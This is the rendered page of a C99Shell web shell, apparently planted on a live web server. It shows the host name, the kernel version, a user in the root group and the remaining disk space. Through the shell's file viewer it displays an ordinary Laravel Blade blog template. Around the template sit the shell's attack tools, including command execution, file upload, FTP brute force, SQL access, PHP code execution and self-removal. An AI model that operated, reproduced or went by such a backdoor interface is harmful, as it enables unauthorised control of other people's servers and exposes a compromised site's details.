!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/resources/views/front/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     blog.blade.php (3.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.frontLayout')

@section('title') {{get_settings('app_name')}} - {{trans('Blogs')}} @endsection

@section('main-section')
<div class="content-blog">
    <div class="container">
        <div class="row">
            <div class="col-12">
                <div class="all-blog-title">
                    Blogs
                </div>
            </div>
        </div>
      <div class="blog-content mt-5 mb-5">
        <div class="row">
           
            @if (isset($blogs) && $blogs)
              @foreach ($blogs as $blog)
              <div class="col-lg-6 col-md-6 col-12 blog-content-data">
                <div class="blog-image">
                    @if (isset($blog->image) && $blog->image)
                    <a href="{{route('blog.details',[$blog->slug])}}">
                        <img src="{{asset('uploads/'.$blog->image)}}" alt="" class="blog-sec-img zoom-effect img-fluid"></a>
                    @endif
                </div>
                <div class="blog-information">
                    <div class="head-info">
                        {{$blog->created_at->format('M d')}}
                    </div>
                    <div class="body-info">
                        @php
                        $blog_title = strip_tags($blog->title);
                        $max_length = 70;
                        $truncated_title = mb_substr($blog_title, 0, $max_length, 'UTF-8');
                        
                        if (mb_strlen($blog_title, 'UTF-8') > $max_length) {
                            $truncated_title = mb_substr($truncated_title, 0, mb_strrpos($truncated_title, ' ', 0, 'UTF-8'));
                            $truncated_title .= '...';
                        }
                    @endphp
                       <h2> <a href="{{route('blog.details',[$blog->slug])}}">
                               {{$truncated_title}}
                        </a>
                    </h2>
                    <div class="blog-details-sec">
                        @php
                            $description = strip_tags($blog->description);
                            $max_length = 170;
                            $truncated_description = mb_substr($description, 0, $max_length, 'UTF-8');
                            
                            if (mb_strlen($description, 'UTF-8') > $max_length) {
                                $truncated_description = mb_substr($truncated_description, 0, mb_strrpos($truncated_description, ' ', 0, 'UTF-8'));
                                $truncated_description .= '...';
                            }
                        @endphp
                        {!! $truncated_description !!}
                        @if (mb_strlen($description, 'UTF-8') > $max_length)
                            <a href="{{ route('blog.details', [$blog->slug]) }}">read more</a>
                        @endif
                    </div>
                    
                    </div>
                </div>
            </div>
              @endforeach
            @endif
        </div>
    </div>

    </div>
</div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0067 ]--